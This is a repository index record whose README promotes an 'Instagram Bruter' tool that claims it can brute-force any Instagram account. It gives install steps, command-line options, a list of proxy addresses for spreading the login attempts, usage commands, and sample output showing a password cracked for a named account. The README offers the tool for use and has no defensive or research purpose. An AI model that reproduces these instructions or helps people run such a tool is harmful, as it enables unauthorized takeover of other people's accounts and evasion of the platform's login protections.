{"id":21680761,"url":"https://github.com/revanmalang/insta","last_synced_at":"2025-03-20T10:29:56.597Z","repository":{"id":184359206,"uuid":"579033051","full_name":"revanmalang/Insta","owner":"revanmalang","description":"instagram tool","archived":false,"fork":false,"pushed_at":"2022-12-16T13:48:28.000Z","size":27,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-25T11:09:09.805Z","etag":null,"topics":["brute-force","brute-force-attacks","bruteforce","bruteforce-attacks","bruteforce-password-cracker","bruteforce-wordlist","hack","hacking","instagram","tool","tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/revanmalang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-12-16T13:46:42.000Z","updated_at":"2023-09-02T04:58:34.000Z","dependencies_parsed_at":null,"dependency_job_id":"a9cb657f-dac6-4bf0-8786-bd5be2cfea84","html_url":"https://github.com/revanmalang/Insta","commit_stats":null,"previous_names":["revanmalang/insta"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/revanmalang%2FInsta","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/revanmalang%2FInsta/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/revanmalang%2FInsta/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/revanmalang%2FInsta/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/revanmalang","download_url":"https://codeload.github.com/revanmalang/Insta/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244594575,"owners_count":20478315,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","brute-force-attacks","bruteforce","bruteforce-attacks","bruteforce-password-cracker","bruteforce-wordlist","hack","hacking","instagram","tool","tools"],"created_at":"2024-11-25T15:20:33.705Z","updated_at":"2025-03-20T10:29:56.567Z","avatar_url":"https://github.com/revanmalang.png","language":"Python","funding_links":["https://www.paypal.me/Msheikh03","https://www.paypal.me/mochrevano"],"categories":[],"sub_categories":[],"readme":"# Instagram Bruter\n\n[![Version](https://img.shields.io/badge/Version-3.1.0-green)]()\n[![Python](https://img.shields.io/badge/Python-v3.9-yellow)]()\n[![Discord](https://img.shields.io/badge/Discord-server-blue)](https://discord.gg/VYRAZg5)\n[![Donate](https://img.shields.io/badge/PayPal-donate-orange)](https://www.paypal.me/Msheikh03)\n\nThis program will brute force any Instagram account you send it its way given a list of proxies.\n\n### NOTICE\n\n~~I'm no longer maintaining this project.~~\n\n### Support\n\nIt motivates me to keep updating this program.\n\n\u003e **PayPal:** https://www.paypal.me/mochrevano\n\n## Requirements\n\n- Python _v3.9_\n- proxy list\n\n## Install Dependencies\n\n### Install Pipenv\n\n```\npip install pipenv\n```\n\n### Create environment\n\nMake sure you have Python 3.9 installed\n\n```\npipenv --python 3.9\n```\n\n### Install Requirements\n\n```\npipenv install\n```\n\n## Help\n\n```\nusage: instagram.py [-h] [-u USERNAME] [-p PASSLIST] [-px PROXYLIST] [--prune PRUNE] [--stats] [-nc] [-m MODE]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -u USERNAME, --username USERNAME\n                        email or username\n  -p PASSLIST, --passlist PASSLIST\n                        password list\n  -px PROXYLIST, --proxylist PROXYLIST\n                        proxy list\n  --prune PRUNE         prune the database\n  --stats               get statistics of the proxies\n  -nc, --no-color       disable colors\n  -m MODE, --mode MODE  modes: 0 =\u003e 32 bots; 1 =\u003e 16 bots; 2 =\u003e 8 bots; 3 =\u003e 4 bots\n```\n\n## Proxies\n\nThe system needs a list of proxies to work. Once uploaded, proxies are saved into a database.\u003cbr/\u003e\n\n### Upload\n\nUpload a list of proxies into the program. The proxy file must have a format of `ip:port`\u003cbr/\u003e\n\n`proxies_list.txt`\n\n```\n3.238.111.248:80\n206.189.59.192:8118\n165.22.81.30:34100\n176.248.120.70:3128\n191.242.178.209:3128\n180.92.194.235:80\n```\n\nTo upload a list of proxies a similar syntax must be followed.\n\n```\npython instagram.py -px \u003cpath to proxy list\u003e\n```\n\n### Stats\n\nThis gives an insight into the health of the proxies in the database.\n\n```\npython instagram.py --stats\n```\n\n### Prune\n\nThis allows the able to get rid of proxies with a score below a given score.\u003cbr/\u003e\nIt is recommended that you run the `--stats` and prune the database of proxies\u003cbr/\u003e\nwho have a proxy score below `Q1`.\n\n```\npython instagram.py --prune 0.05\n```\n\nPruning is not a requirement because the \u003cbr/\u003e\nthe system will automatically learn which proxies perform poorly and stop using them.\n\n### Usage\n\n```\npython instagram.py -u \u003cusername\u003e -p \u003cpasslist\u003e\n```\n\n### Run\n\n```\n[-] Wordlist: passlist.txt\n[-] Username: Sami09.1\n[-] Password: 272\n[-] Complete: 45.51%\n[-] Attempts: 228\n[-] Browsers: 273\n[-] Exists: True\n```\n\n### Stop\n\n```\n[-] Wordlist: passlist.txt\n[-] Username: Sami09.1\n[-] Password: Sami123\n[-] Complete: 62.67%\n[-] Attempts: 314\n[-] Browsers: 185\n[-] Exists: True\n\n[!] Password Found\n[+] Username: Sami09.1\n[+] Password: Sami123\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frevanmalang%2Finsta","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frevanmalang%2Finsta","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frevanmalang%2Finsta/lists"}